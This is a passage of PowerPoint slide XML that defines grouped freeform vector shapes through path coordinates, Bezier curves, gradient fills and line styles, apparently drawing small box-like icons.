                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 661"/>
                  <a:gd name="T1" fmla="*/ 52 h 175"/>
                  <a:gd name="T2" fmla="*/ 208 w 661"/>
                  <a:gd name="T3" fmla="*/ 0 h 175"/>
                  <a:gd name="T4" fmla="*/ 661 w 661"/>
                  <a:gd name="T5" fmla="*/ 121 h 175"/>
                  <a:gd name="T6" fmla="*/ 453 w 661"/>
                  <a:gd name="T7" fmla="*/ 175 h 175"/>
                  <a:gd name="T8" fmla="*/ 0 w 661"/>
                  <a:gd name="T9" fmla="*/ 52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1" h="175">
                    <a:moveTo>
                      <a:pt x="0" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="208" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="661" y="121"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="175"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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32" name="Freeform 1746">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC4C198B-9AA4-45D7-A2F3-3C6FFFC57DC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4" y="2047"/>
                <a:ext cx="118" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 199"/>
                  <a:gd name="T1" fmla="*/ 54 h 87"/>
                  <a:gd name="T2" fmla="*/ 0 w 199"/>
                  <a:gd name="T3" fmla="*/ 87 h 87"/>
                  <a:gd name="T4" fmla="*/ 199 w 199"/>
                  <a:gd name="T5" fmla="*/ 35 h 87"/>
                  <a:gd name="T6" fmla="*/ 199 w 199"/>
                  <a:gd name="T7" fmla="*/ 0 h 87"/>
                  <a:gd name="T8" fmla="*/ 0 w 199"/>
                  <a:gd name="T9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9" h="87">
                    <a:moveTo>
                      <a:pt x="0" y="54"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="5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33" name="Freeform 1747">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4472924E-9454-4012-8BAD-526BE739FB6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6" y="2006"/>
                <a:ext cx="268" cy="93"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 453 w 453"/>
                  <a:gd name="T1" fmla="*/ 156 h 156"/>
                  <a:gd name="T2" fmla="*/ 0 w 453"/>
                  <a:gd name="T3" fmla="*/ 36 h 156"/>
                  <a:gd name="T4" fmla="*/ 0 w 453"/>
                  <a:gd name="T5" fmla="*/ 0 h 156"/>
                  <a:gd name="T6" fmla="*/ 453 w 453"/>
                  <a:gd name="T7" fmla="*/ 123 h 156"/>
                  <a:gd name="T8" fmla="*/ 453 w 453"/>
                  <a:gd name="T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3" h="156">
                    <a:moveTo>
                      <a:pt x="453" y="156"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="453" y="15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34" name="Freeform 1748">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D4098CA-6578-416E-9EBC-9D219EFF1DD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4" y="1984"/>
                <a:ext cx="306" cy="83"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 517"/>
                  <a:gd name="T1" fmla="*/ 37 h 139"/>
                  <a:gd name="T2" fmla="*/ 382 w 517"/>
                  <a:gd name="T3" fmla="*/ 139 h 139"/>
                  <a:gd name="T4" fmla="*/ 517 w 517"/>
                  <a:gd name="T5" fmla="*/ 101 h 139"/>
                  <a:gd name="T6" fmla="*/ 134 w 517"/>
                  <a:gd name="T7" fmla="*/ 0 h 139"/>
                  <a:gd name="T8" fmla="*/ 0 w 517"/>
                  <a:gd name="T9" fmla="*/ 37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7" h="139">
                    <a:moveTo>
                      <a:pt x="0" y="37"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="382" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="517" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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607" name="Line 1769">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA2DA321-A549-405B-8631-8B0B916EF351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8365017" y="1912617"/>
              <a:ext cx="0" cy="142875"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF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08" name="Line 1770">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E452AEB-D2C9-4D30-9FE7-7D9DA97F97F6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8004655" y="2020567"/>
              <a:ext cx="0" cy="142875"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="19050">
              <a:solidFill>
                <a:srgbClr val="FF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09" name="Group 1767">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{182FAF35-0FF4-42A5-9B92-0988A2A447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60200" y="1769749"/>
              <a:ext cx="701676" cy="323851"/>
              <a:chOff x="3356" y="1525"/>
              <a:chExt cx="442" cy="204"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="2009" name="Group 1749">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02DF16ED-E712-44CE-8AF8-EC08E60D1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3583" y="1525"/>
                <a:ext cx="215" cy="139"/>
                <a:chOff x="126" y="1682"/>
                <a:chExt cx="646" cy="417"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2019" name="Freeform 1750">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{795CF580-793E-4B0F-A559-AC8E81EA74B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95" y="1682"/>
                  <a:ext cx="295" cy="368"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 211"/>
                    <a:gd name="T1" fmla="*/ 8 h 263"/>
                    <a:gd name="T2" fmla="*/ 14 w 211"/>
                    <a:gd name="T3" fmla="*/ 207 h 263"/>
                    <a:gd name="T4" fmla="*/ 192 w 211"/>
                    <a:gd name="T5" fmla="*/ 254 h 263"/>
                    <a:gd name="T6" fmla="*/ 192 w 211"/>
                    <a:gd name="T7" fmla="*/ 56 h 263"/>
                    <a:gd name="T8" fmla="*/ 14 w 211"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="226"/>
                        <a:pt x="179" y="263"/>
                        <a:pt x="192" y="254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="204" y="246"/>
                        <a:pt x="211" y="94"/>
                        <a:pt x="192" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="42"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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20" name="Freeform 1751">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA3D0988-A911-4F58-BE09-29051D73B13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33" y="1719"/>
                  <a:ext cx="212" cy="291"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 359"/>
                    <a:gd name="T1" fmla="*/ 0 h 493"/>
                    <a:gd name="T2" fmla="*/ 0 w 359"/>
                    <a:gd name="T3" fmla="*/ 397 h 493"/>
                    <a:gd name="T4" fmla="*/ 359 w 359"/>
                    <a:gd name="T5" fmla="*/ 493 h 493"/>
                    <a:gd name="T6" fmla="*/ 359 w 359"/>
                    <a:gd name="T7" fmla="*/ 97 h 493"/>
                    <a:gd name="T8" fmla="*/ 0 w 359"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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9" h="493">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="493"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="9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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="68627"/>
                        <a:invGamma/>
                      </a:srgbClr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21" name="Freeform 1752">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB23C92E-1358-43D0-9DF7-CFCFE0C899D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15" y="1684"/>
                  <a:ext cx="284" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 99 w 203"/>
                    <a:gd name="T1" fmla="*/ 15 h 65"/>
                    <a:gd name="T2" fmla="*/ 27 w 203"/>
                    <a:gd name="T3" fmla="*/ 0 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 7 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 7 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 203"/>
                    <a:gd name="T9" fmla="*/ 7 h 65"/>
                    <a:gd name="T10" fmla="*/ 178 w 203"/>
                    <a:gd name="T11" fmla="*/ 55 h 65"/>
                    <a:gd name="T12" fmla="*/ 203 w 203"/>
                    <a:gd name="T13" fmla="*/ 48 h 65"/>
                    <a:gd name="T14" fmla="*/ 99 w 203"/>
                    <a:gd name="T15" fmla="*/ 15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03" h="65">
                      <a:moveTo>
                        <a:pt x="99" y="15"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="2"/>
                        <a:pt x="27" y="0"/>
                        <a:pt x="27" y="0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2" y="0"/>
                        <a:pt x="168" y="44"/>
                        <a:pt x="178" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="65"/>
                        <a:pt x="203" y="48"/>
                        <a:pt x="203" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="48"/>
                        <a:pt x="163" y="29"/>
                        <a:pt x="99" y="1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22" name="Freeform 1753">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB627D9-9E62-4EA6-B7E3-303C08366CA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64" y="1751"/>
                  <a:ext cx="208" cy="286"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 149"/>
                    <a:gd name="T1" fmla="*/ 205 h 205"/>
                    <a:gd name="T2" fmla="*/ 15 w 149"/>
                    <a:gd name="T3" fmla="*/ 201 h 205"/>
                    <a:gd name="T4" fmla="*/ 129 w 149"/>
                    <a:gd name="T5" fmla="*/ 150 h 205"/>
                    <a:gd name="T6" fmla="*/ 149 w 149"/>
                    <a:gd name="T7" fmla="*/ 112 h 205"/>
                    <a:gd name="T8" fmla="*/ 149 w 149"/>
                    <a:gd name="T9" fmla="*/ 60 h 205"/>
                    <a:gd name="T10" fmla="*/ 25 w 149"/>
                    <a:gd name="T11" fmla="*/ 0 h 205"/>
                    <a:gd name="T12" fmla="*/ 0 w 149"/>
                    <a:gd name="T13" fmla="*/ 7 h 205"/>
                    <a:gd name="T14" fmla="*/ 0 w 149"/>
                    <a:gd name="T15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49" h="205">
                      <a:moveTo>
                        <a:pt x="0" y="205"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="6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3" y="35"/>
                        <a:pt x="20" y="189"/>
                        <a:pt x="0" y="20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23" name="Freeform 1754">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F370FC2-F4D7-4F72-8F6A-4A9A050B181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26" y="1976"/>
                  <a:ext cx="391" cy="103"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 661"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 661"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 661 w 661"/>
                    <a:gd name="T5" fmla="*/ 121 h 175"/>
                    <a:gd name="T6" fmla="*/ 453 w 661"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 661"/>
                    <a:gd name="T9" fmla="*/ 52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1" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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24" name="Freeform 1755">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE27681-112D-49FA-99D4-C4B97D55537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94" y="2047"/>
                  <a:ext cx="118" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 199"/>
                    <a:gd name="T1" fmla="*/ 54 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 199"/>
                    <a:gd name="T3" fmla="*/ 87 h 87"/>
                    <a:gd name="T4" fmla="*/ 199 w 199"/>
                    <a:gd name="T5" fmla="*/ 35 h 87"/>
                    <a:gd name="T6" fmla="*/ 199 w 199"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 0 w 199"/>
                    <a:gd name="T9" fmla="*/ 54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9" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="87"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="199" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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25" name="Freeform 1756">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A592DD36-3F38-4863-A016-01CAF9E8925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26" y="2006"/>
                  <a:ext cx="268" cy="93"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 453 w 453"/>
                    <a:gd name="T1" fmla="*/ 156 h 156"/>
                    <a:gd name="T2" fmla="*/ 0 w 453"/>
                    <a:gd name="T3" fmla="*/ 36 h 156"/>
                    <a:gd name="T4" fmla="*/ 0 w 453"/>
                    <a:gd name="T5" fmla="*/ 0 h 156"/>
                    <a:gd name="T6" fmla="*/ 453 w 453"/>
                    <a:gd name="T7" fmla="*/ 123 h 156"/>
                    <a:gd name="T8" fmla="*/ 453 w 453"/>
                    <a:gd name="T9" fmla="*/ 156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3" h="156">
                      <a:moveTo>
                        <a:pt x="453" y="156"/>
                      </a:move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453" y="123"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="15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26" name="Freeform 1757">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{162A7A06-71BA-4A84-9156-3C0704926D9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4" y="1984"/>
                  <a:ext cx="306" cy="83"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 517"/>
                    <a:gd name="T1" fmla="*/ 37 h 139"/>
                    <a:gd name="T2" fmla="*/ 382 w 517"/>
                    <a:gd name="T3" fmla="*/ 139 h 139"/>
                    <a:gd name="T4" fmla="*/ 517 w 517"/>
                    <a:gd name="T5" fmla="*/ 101 h 139"/>
                    <a:gd name="T6" fmla="*/ 134 w 517"/>
                    <a:gd name="T7" fmla="*/ 0 h 139"/>
                    <a:gd name="T8" fmla="*/ 0 w 517"/>
                    <a:gd name="T9" fmla="*/ 37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7" h="139">
                      <a:moveTo>
                        <a:pt x="0" y="37"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="382" y="139"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="517" y="101"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="134" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="3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10" name="Group 1758">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECD97FF8-6AE7-4483-A37B-0FAFC099CB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3356" y="1590"/>
                <a:ext cx="215" cy="139"/>
                <a:chOff x="126" y="1682"/>
                <a:chExt cx="646" cy="417"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="2011" name="Freeform 1759">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71CFA29F-FF78-4D17-9C00-4CFEB94BE80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95" y="1682"/>
                  <a:ext cx="295" cy="368"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 14 w 211"/>
                    <a:gd name="T1" fmla="*/ 8 h 263"/>
                    <a:gd name="T2" fmla="*/ 14 w 211"/>
                    <a:gd name="T3" fmla="*/ 207 h 263"/>
                    <a:gd name="T4" fmla="*/ 192 w 211"/>
                    <a:gd name="T5" fmla="*/ 254 h 263"/>
                    <a:gd name="T6" fmla="*/ 192 w 211"/>
                    <a:gd name="T7" fmla="*/ 56 h 263"/>
                    <a:gd name="T8" fmla="*/ 14 w 211"/>
                    <a:gd name="T9" fmla="*/ 8 h 2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1" h="263">
                      <a:moveTo>
                        <a:pt x="14" y="8"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="16"/>
                        <a:pt x="1" y="187"/>
                        <a:pt x="14" y="207"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="226"/>
                        <a:pt x="179" y="263"/>
                        <a:pt x="192" y="254"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="204" y="246"/>
                        <a:pt x="211" y="94"/>
                        <a:pt x="192" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="185" y="42"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="14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12" name="Freeform 1760">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{470EC059-B8FB-47F1-8D05-48DC2EE05F5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33" y="1719"/>
                  <a:ext cx="212" cy="291"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 359"/>
                    <a:gd name="T1" fmla="*/ 0 h 493"/>
                    <a:gd name="T2" fmla="*/ 0 w 359"/>
                    <a:gd name="T3" fmla="*/ 397 h 493"/>
                    <a:gd name="T4" fmla="*/ 359 w 359"/>
                    <a:gd name="T5" fmla="*/ 493 h 493"/>
                    <a:gd name="T6" fmla="*/ 359 w 359"/>
                    <a:gd name="T7" fmla="*/ 97 h 493"/>
                    <a:gd name="T8" fmla="*/ 0 w 359"/>
                    <a:gd name="T9" fmla="*/ 0 h 4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9" h="493">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="397"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="493"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="359" y="9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69A2E1"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="69A2E1">
                        <a:gamma/>
                        <a:tint val="70588"/>
                        <a:invGamma/>
                      </a:srgbClr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13" name="Freeform 1761">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57AFD750-0674-4376-8843-012F2DDE536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15" y="1684"/>
                  <a:ext cx="284" cy="90"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 99 w 203"/>
                    <a:gd name="T1" fmla="*/ 15 h 65"/>
                    <a:gd name="T2" fmla="*/ 27 w 203"/>
                    <a:gd name="T3" fmla="*/ 0 h 65"/>
                    <a:gd name="T4" fmla="*/ 0 w 203"/>
                    <a:gd name="T5" fmla="*/ 7 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 203"/>
                    <a:gd name="T7" fmla="*/ 7 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 203"/>
                    <a:gd name="T9" fmla="*/ 7 h 65"/>
                    <a:gd name="T10" fmla="*/ 178 w 203"/>
                    <a:gd name="T11" fmla="*/ 55 h 65"/>
                    <a:gd name="T12" fmla="*/ 203 w 203"/>
                    <a:gd name="T13" fmla="*/ 48 h 65"/>
                    <a:gd name="T14" fmla="*/ 99 w 203"/>
                    <a:gd name="T15" fmla="*/ 15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03" h="65">
                      <a:moveTo>
                        <a:pt x="99" y="15"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="2"/>
                        <a:pt x="27" y="0"/>
                        <a:pt x="27" y="0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2" y="0"/>
                        <a:pt x="168" y="44"/>
                        <a:pt x="178" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="188" y="65"/>
                        <a:pt x="203" y="48"/>
                        <a:pt x="203" y="48"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="203" y="48"/>
                        <a:pt x="163" y="29"/>
                        <a:pt x="99" y="1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14" name="Freeform 1762">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{187915FF-5651-403D-BC67-3F28BEE41A7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64" y="1751"/>
                  <a:ext cx="208" cy="286"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 149"/>
                    <a:gd name="T1" fmla="*/ 205 h 205"/>
                    <a:gd name="T2" fmla="*/ 15 w 149"/>
                    <a:gd name="T3" fmla="*/ 201 h 205"/>
                    <a:gd name="T4" fmla="*/ 129 w 149"/>
                    <a:gd name="T5" fmla="*/ 150 h 205"/>
                    <a:gd name="T6" fmla="*/ 149 w 149"/>
                    <a:gd name="T7" fmla="*/ 112 h 205"/>
                    <a:gd name="T8" fmla="*/ 149 w 149"/>
                    <a:gd name="T9" fmla="*/ 60 h 205"/>
                    <a:gd name="T10" fmla="*/ 25 w 149"/>
                    <a:gd name="T11" fmla="*/ 0 h 205"/>
                    <a:gd name="T12" fmla="*/ 0 w 149"/>
                    <a:gd name="T13" fmla="*/ 7 h 205"/>
                    <a:gd name="T14" fmla="*/ 0 w 149"/>
                    <a:gd name="T15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49" h="205">
                      <a:moveTo>
                        <a:pt x="0" y="205"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                        <a:pt x="15" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                        <a:pt x="129" y="150"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                        <a:pt x="149" y="112"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="60"/>
                        <a:pt x="149" y="6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3" y="35"/>
                        <a:pt x="20" y="189"/>
                        <a:pt x="0" y="20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15" name="Freeform 1763">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF998F1A-9F27-4C5C-9B04-9C149EF5EFB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26" y="1976"/>
                  <a:ext cx="391" cy="103"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 661"/>
                    <a:gd name="T1" fmla="*/ 52 h 175"/>
                    <a:gd name="T2" fmla="*/ 208 w 661"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 661 w 661"/>
                    <a:gd name="T5" fmla="*/ 121 h 175"/>
                    <a:gd name="T6" fmla="*/ 453 w 661"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 0 w 661"/>
                    <a:gd name="T9" fmla="*/ 52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1" h="175">
                      <a:moveTo>
                        <a:pt x="0" y="52"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="208" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="661" y="121"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="453" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="5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16" name="Freeform 1764">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C134E9B-FD29-4BA1-B6A0-2A8E8AC6E44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94" y="2047"/>
                  <a:ext cx="118" cy="52"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 199"/>
                    <a:gd name="T1" fmla="*/ 54 h 87"/>
                    <a:gd name="T2" fmla="*/ 0 w 199"/>
                    <a:gd name="T3" fmla="*/ 87 h 87"/>
                    <a:gd name="T4" fmla="*/ 199 w 199"/>
                    <a:gd name="T5" fmla="*/ 35 h 87"/>
                    <a:gd name="T6" fmla="*/ 199 w 199"/>
                    <a:gd name="T7" fmla="*/ 0 h 87"/>
                    <a:gd name="T8" fmla="*/ 0 w 199"/>
                    <a:gd name="T9" fmla="*/ 54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9" h="87">
                      <a:moveTo>
                        <a:pt x="0" y="54"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="87"/>
                      </a:lnTo>
